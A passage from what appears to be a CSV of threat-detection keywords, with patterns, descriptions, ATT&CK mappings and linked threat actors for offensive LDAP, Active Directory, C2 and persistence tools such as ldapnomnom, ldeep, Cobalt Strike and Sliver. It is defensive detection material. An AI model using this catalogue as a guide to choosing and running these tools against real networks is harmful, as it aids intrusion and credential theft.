Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50876" "*LdapMiner*",".{0,1000}LdapMiner.{0,1000}","offensive_tool_keyword","ldapminer","This is a tool I wrote to collect information from different LDAP Server implementation. 
This was written in C with the Netscape C","T1016 - T1018 - T1021 - T1046 - T1056 - T1069 - T1078 - T1087 - T1114 - T1482 - T1526 - T1597","TA0007","N/A","N/A","Discovery","https://sourceforge.net/projects/ldapminer/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50877" "*ldapnomnom *",".{0,1000}ldapnomnom\s.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50878" "*ldapnomnom --input*",".{0,1000}ldapnomnom\s\-\-input.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50879" "*ldapnomnom*-obfuscated*",".{0,1000}ldapnomnom.{0,1000}\-obfuscated.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50880" "*ldapnomnom-darwin-*",".{0,1000}ldapnomnom\-darwin\-.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","#linux","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50881" 
"*ldapnomnom-linux-*",".{0,1000}ldapnomnom\-linux\-.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","#linux","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50882" "*ldapnomnom-main*",".{0,1000}ldapnomnom\-main.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50883" "*ldapnomnom-windows-386.exe*",".{0,1000}ldapnomnom\-windows\-386\.exe.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50884" "*ldapnomnom-windows-amd64.exe*",".{0,1000}ldapnomnom\-windows\-amd64\.exe.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50885" "*ldapnomnom-windows-arm64.exe*",".{0,1000}ldapnomnom\-windows\-arm64\.exe.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - 
T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50886" "*LDAP-Password-Hunter*",".{0,1000}LDAP\-Password\-Hunter.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","50887" "*ldaprelayclient.py*",".{0,1000}ldaprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 
- T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","50888" "*ldaprelayclient.py*",".{0,1000}ldaprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50889" "*LdapRelayScan.py*",".{0,1000}LdapRelayScan\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50890" "*LdapRelayScan.py*",".{0,1000}LdapRelayScan\.py.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","50891" "*LdapRelayScan-main*",".{0,1000}LdapRelayScan\-main.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","50892" 
"*ldapsearchad.py*",".{0,1000}ldapsearchad\.py.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","#linux #windows","N/A","5","3","215","36","2024-12-10T17:00:02Z","2019-12-08T00:25:57Z","50895" "*ldapsearch-ad.py*",".{0,1000}ldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","#linux #windows","N/A","5","3","215","36","2024-12-10T17:00:02Z","2019-12-08T00:25:57Z","50896" "*ldap-searcher *",".{0,1000}ldap\-searcher\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","50897" "*ldapsentinel * raw *",".{0,1000}ldapsentinel\s.{0,1000}\sraw\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - 
T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50898" "*ldapsentinel forest user*",".{0,1000}ldapsentinel\sforest\suser.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50899" "*LdapSignCheck.exe*",".{0,1000}LdapSignCheck\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - 
CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","50900" "*LdapSignCheck.Natives*",".{0,1000}LdapSignCheck\.Natives.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin 
- Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","50901" "*LdapSignCheck.sln*",".{0,1000}LdapSignCheck\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","50902" "*ldapsigncheck.x64.*",".{0,1000}ldapsigncheck\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","50903" "*ldapsigncheck.x86.*",".{0,1000}ldapsigncheck\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check 
LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","50904" "*LDAPWordlistHarvester.ps1*",".{0,1000}LDAPWordlistHarvester\.ps1.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","Black Basta","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","N/A","5","","N/A","","","","50905" 
"*LDAPWordlistHarvester.py*",".{0,1000}LDAPWordlistHarvester\.py.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","Black Basta","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","N/A","5","","N/A","","","","50906" "*LDAPWordlistHarvester-main*",".{0,1000}LDAPWordlistHarvester\-main.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","Black Basta","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","N/A","5","","N/A","","","","50907" "*ldd2bloodhound*",".{0,1000}ldd2bloodhound.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","50908" "*ldeep cache *",".{0,1000}ldeep\scache\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","50909" "*ldeep ldap -u *",".{0,1000}ldeep\sldap\s\-u\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","50910" 
"*ldeep*activedirectory.py*",".{0,1000}ldeep.{0,1000}activedirectory\.py.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","50911" "*ldeep*ldap_activedirectory.py*",".{0,1000}ldeep.{0,1000}ldap_activedirectory\.py.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","50912" "*ldeep_dump_users_enabled.json",".{0,1000}ldeep_dump_users_enabled\.json","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","50913" "*ldeep_dump_users_enabled.lst",".{0,1000}ldeep_dump_users_enabled\.lst","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","50914" "*ldeep_enum*",".{0,1000}ldeep_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50915" 
"*ldif2john.pl*",".{0,1000}ldif2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50916" "*LDPreloadPrivesc*",".{0,1000}LDPreloadPrivesc.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","50918" "*LdrLockLiberator-main*",".{0,1000}LdrLockLiberator\-main.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","0","N/A","N/A","9","4","375","65","2024-10-29T23:05:45Z","2023-10-31T10:11:16Z","50919" "*leaky/leakbuf.go*",".{0,1000}leaky\/leakbuf\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
